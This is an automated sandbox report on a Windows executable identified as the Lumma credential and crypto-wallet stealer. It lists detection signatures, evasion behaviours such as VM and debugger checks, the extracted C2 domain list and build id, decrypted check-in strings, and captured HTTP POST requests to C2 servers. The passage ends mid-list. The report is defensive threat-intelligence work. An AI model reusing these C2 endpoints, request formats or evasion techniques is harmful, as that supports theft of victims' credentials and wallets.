Edit tour

Windows Analysis Report
b0ho5YYSdo.exe

Overview

General Information

Sample name:b0ho5YYSdo.exe
renamed because original name is a hash value
Original sample name:26b5af1cfc3efc73b6d9be8f11412a9b.exe
Analysis ID:1580881
MD5:26b5af1cfc3efc73b6d9be8f11412a9b
SHA1:669f03be44e22fa6842b05a1aaa9b08870e5c73a
SHA256:0d637271932e343f729bf09cbcc63204c681bef4d60e72767bed5f281203ce76
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to detect virtual machines (SLDT)
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • b0ho5YYSdo.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\b0ho5YYSdo.exe" MD5: 26B5AF1CFC3EFC73B6D9BE8F11412A9B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{
  "C2 url": [
    "screwamusresz.buzz",
    "inherineau.buzz",
    "hummskitnj.buzz",
    "prisonyfork.buzz",
    "cashfuzysao.buzz",
    "rebuildeso.buzz",
    "appliacnesot.buzz",
    "scentniej.buzz",
    "mindhandru.buzz"
  ],
  "Build id": "PsFKDg--pablo"
}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2264629296.00000000006D8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.2287190996.00000000006DA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2229105379.00000000006E2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2228954482.00000000006E2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2230325310.00000000006D8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 8 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-26T12:49:21.415722+010020283713Unknown Traffic192.168.2.949712104.21.11.101443TCP
              2024-12-26T12:49:53.664897+010020283713Unknown Traffic192.168.2.949783104.21.74.40443TCP
              2024-12-26T12:50:05.565652+010020283713Unknown Traffic192.168.2.949808172.67.143.157443TCP
              2024-12-26T12:50:13.569469+010020283713Unknown Traffic192.168.2.949825104.21.63.217443TCP
              2024-12-26T12:50:17.599579+010020283713Unknown Traffic192.168.2.949836172.67.206.214443TCP
              2024-12-26T12:50:21.575761+010020283713Unknown Traffic192.168.2.949847104.21.66.113443TCP
              2024-12-26T12:50:30.884302+010020283713Unknown Traffic192.168.2.949868104.21.66.113443TCP
              2024-12-26T12:50:47.836398+010020283713Unknown Traffic192.168.2.949904104.21.66.113443TCP
              2024-12-26T12:50:49.514459+010020283713Unknown Traffic192.168.2.949910104.21.66.113443TCP
              2024-12-26T12:50:51.307799+010020283713Unknown Traffic192.168.2.949913104.21.66.113443TCP
              2024-12-26T12:50:53.499492+010020283713Unknown Traffic192.168.2.949919104.21.66.113443TCP
              2024-12-26T12:50:55.997442+010020283713Unknown Traffic192.168.2.949923104.21.66.113443TCP
              2024-12-26T12:50:57.347355+010020283713Unknown Traffic192.168.2.949929104.21.66.113443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-26T12:49:51.925865+010020546531A Network Trojan was detected192.168.2.949712104.21.11.101443TCP
              2024-12-26T12:50:03.925898+010020546531A Network Trojan was detected192.168.2.949783104.21.74.40443TCP
              2024-12-26T12:50:11.934577+010020546531A Network Trojan was detected192.168.2.949808172.67.143.157443TCP
              2024-12-26T12:50:15.926388+010020546531A Network Trojan was detected192.168.2.949825104.21.63.217443TCP
              2024-12-26T12:50:19.926101+010020546531A Network Trojan was detected192.168.2.949836172.67.206.214443TCP
              2024-12-26T12:50:29.506820+010020546531A Network Trojan was detected192.168.2.949847104.21.66.113443TCP
              2024-12-26T12:50:45.975033+010020546531A Network Trojan was detected192.168.2.949868104.21.66.113443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-26T12:49:51.925865+010020498361A Network Trojan was detected192.168.2.949712104.21.11.101443TCP
              2024-12-26T12:50:03.925898+010020498361A Network Trojan was detected192.168.2.949783104.21.74.40443TCP
              2024-12-26T12:50:11.934577+010020498361A Network Trojan was detected192.168.2.949808172.67.143.157443TCP
              2024-12-26T12:50:15.926388+010020498361A Network Trojan was detected192.168.2.949825104.21.63.217443TCP
              2024-12-26T12:50:19.926101+010020498361A Network Trojan was detected192.168.2.949836172.67.206.214443TCP
              2024-12-26T12:50:29.506820+010020498361A Network Trojan was detected192.168.2.949847104.21.66.113443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-26T12:50:45.975033+010020498121A Network Trojan was detected192.168.2.949868104.21.66.113443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: b0ho5YYSdo.exeAvira: detected
              Source: https://screwamusresz.buzz:443/apiAvira URL Cloud: Label: malware
              Source: https://rebuildeso.buzz/apiAvira URL Cloud: Label: malware
              Source: https://prisonyfork.buzz/apiAvira URL Cloud: Label: malware
              Source: https://scentniej.buzz/apiAvira URL Cloud: Label: malware
              Source: https://inherineau.buzz/apiAvira URL Cloud: Label: malware
              Source: https://screwamusresz.buzz/apiAvira URL Cloud: Label: malware
              Source: b0ho5YYSdo.exe.7412.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["screwamusresz.buzz", "inherineau.buzz", "hummskitnj.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "rebuildeso.buzz", "appliacnesot.buzz", "scentniej.buzz", "mindhandru.buzz"], "Build id": "PsFKDg--pablo"}
              Source: b0ho5YYSdo.exeVirustotal: Detection: 50%Perma Link
              Source: b0ho5YYSdo.exeReversingLabs: Detection: 55%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: b0ho5YYSdo.exeJoe Sandbox ML: detected
              Source: 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString decryptor: hummskitnj.buzz
              Source: 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString decryptor: cashfuzysao.buzz
              Source: 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString decryptor: appliacnesot.buzz
              Source: 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString decryptor: screwamusresz.buzz
              Source: 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString decryptor: inherineau.buzz
              Source: 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString decryptor: scentniej.buzz
              Source: 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString decryptor: rebuildeso.buzz
              Source: 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString decryptor: prisonyfork.buzz
              Source: 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString decryptor: mindhandru.buzz
              Source: 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString decryptor: PsFKDg--pablo
              Source: b0ho5YYSdo.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.74.40:443 -> 192.168.2.9:49783 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.143.157:443 -> 192.168.2.9:49808 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.63.217:443 -> 192.168.2.9:49825 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.214:443 -> 192.168.2.9:49836 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.113:443 -> 192.168.2.9:49847 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.113:443 -> 192.168.2.9:49868 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.113:443 -> 192.168.2.9:49904 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.113:443 -> 192.168.2.9:49910 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.113:443 -> 192.168.2.9:49913 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.113:443 -> 192.168.2.9:49919 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.113:443 -> 192.168.2.9:49923 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.113:443 -> 192.168.2.9:49929 version: TLS 1.2

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49825 -> 104.21.63.217:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49825 -> 104.21.63.217:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49836 -> 172.67.206.214:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49836 -> 172.67.206.214:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49712 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49712 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49783 -> 104.21.74.40:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49808 -> 172.67.143.157:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49868 -> 104.21.66.113:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49868 -> 104.21.66.113:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49783 -> 104.21.74.40:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49808 -> 172.67.143.157:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49847 -> 104.21.66.113:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49847 -> 104.21.66.113:443
              Source: Malware configuration extractorURLs: screwamusresz.buzz
              Source: Malware configuration extractorURLs: inherineau.buzz
              Source: Malware configuration extractorURLs: hummskitnj.buzz
              Source: Malware configuration extractorURLs: prisonyfork.buzz
              Source: Malware configuration extractorURLs: cashfuzysao.buzz
              Source: Malware configuration extractorURLs: rebuildeso.buzz
              Source: Malware configuration extractorURLs: appliacnesot.buzz
              Source: Malware configuration extractorURLs: scentniej.buzz
              Source: Malware configuration extractorURLs: mindhandru.buzz
              Source: Joe Sandbox ViewIP Address: 104.21.11.101 104.21.11.101
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49712 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49808 -> 172.67.143.157:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49783 -> 104.21.74.40:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49836 -> 172.67.206.214:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49825 -> 104.21.63.217:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49904 -> 104.21.66.113:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49910 -> 104.21.66.113:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49868 -> 104.21.66.113:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49913 -> 104.21.66.113:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49923 -> 104.21.66.113:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49929 -> 104.21.66.113:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49919 -> 104.21.66.113:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49847 -> 104.21.66.113:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: prisonyfork.buzz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rebuildeso.buzz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: scentniej.buzz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: inherineau.buzz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: screwamusresz.buzz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: screwamusresz.buzz
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
              Source: global trafficDNS traffic detected: DNS query: prisonyfork.buzz
              Source: global trafficDNS traffic detected: DNS query: rebuildeso.buzz
              Source: global trafficDNS traffic detected: DNS query: scentniej.buzz
              Source: global trafficDNS traffic detected: DNS query: inherineau.buzz
              Source: global trafficDNS traffic detected: DNS query: screwamusresz.buzz
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
              Source: b0ho5YYSdo.exe, 00000000.00000003.2262417268.0000000005520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: b0ho5YYSdo.exe, 00000000.00000003.2262417268.0000000005520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: b0ho5YYSdo.exe, 00000000.00000003.2262417268.0000000005520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: b0ho5YYSdo.exe, 00000000.00000003.2262417268.0000000005520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: b0ho5YYSdo.exe, 00000000.00000003.2262417268.0000000005520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: b0ho5YYSdo.exe, 00000000.00000003.2262417268.0000000005520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: b0ho5YYSdo.exe, 00000000.00000003.2262417268.0000000005520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: b0ho5YYSdo.exe, 00000000.00000003.2262417268.0000000005520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: b0ho5YYSdo.exe, 00000000.00000003.2262417268.0000000005520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: b0ho5YYSdo.exe, 00000000.00000003.2262417268.0000000005520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: b0ho5YYSdo.exe, 00000000.00000003.2262417268.0000000005520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: b0ho5YYSdo.exe, 00000000.00000003.2230247900.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230451591.00000000054E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: b0ho5YYSdo.exe, 00000000.00000003.2279658506.00000000054FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
              Source: b0ho5YYSdo.exe, 00000000.00000003.2279658506.00000000054FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
              Source: b0ho5YYSdo.exe, 00000000.00000003.2230247900.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230451591.00000000054E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: b0ho5YYSdo.exe, 00000000.00000003.2230247900.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230451591.00000000054E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: b0ho5YYSdo.exe, 00000000.00000003.2230247900.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230451591.00000000054E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: b0ho5YYSdo.exe, 00000000.00000003.2279658506.00000000054FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
              Source: b0ho5YYSdo.exe, 00000000.00000003.2279658506.00000000054FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: b0ho5YYSdo.exe, 00000000.00000003.2230247900.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230451591.00000000054E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: b0ho5YYSdo.exe, 00000000.00000003.2230247900.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230451591.00000000054E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: b0ho5YYSdo.exe, 00000000.00000003.2230247900.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230451591.00000000054E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: b0ho5YYSdo.exe, 00000000.00000003.2279658506.00000000054FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: b0ho5YYSdo.exe, 00000000.00000003.1965484060.00000000006E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inherineau.buzz/
              Source: b0ho5YYSdo.exe, 00000000.00000003.1965484060.00000000006E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inherineau.buzz/api
              Source: b0ho5YYSdo.exe, 00000000.00000003.1965484060.00000000006E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inherineau.buzz/zX
              Source: b0ho5YYSdo.exe, 00000000.00000003.1965484060.00000000006E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://prisonyfork.buzz/api
              Source: b0ho5YYSdo.exe, 00000000.00000003.1965484060.00000000006E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scentniej.buzz/
              Source: b0ho5YYSdo.exe, 00000000.00000003.2229792744.00000000006C6000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2228757080.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2109044489.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230936460.00000000006C6000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2228954482.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.1965484060.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2230325310.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scentniej.buzz/apij
              Source: b0ho5YYSdo.exe, b0ho5YYSdo.exe, 00000000.00000003.2326502056.0000000000729000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2264629296.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2312595522.00000000054C9000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2339796853.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2347127317.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2287190996.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2341027601.000000000072A000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2228826946.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2279517554.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2326355109.0000000000725000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2340795803.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2109044489.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2261752329.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2229105379.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2279546614.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 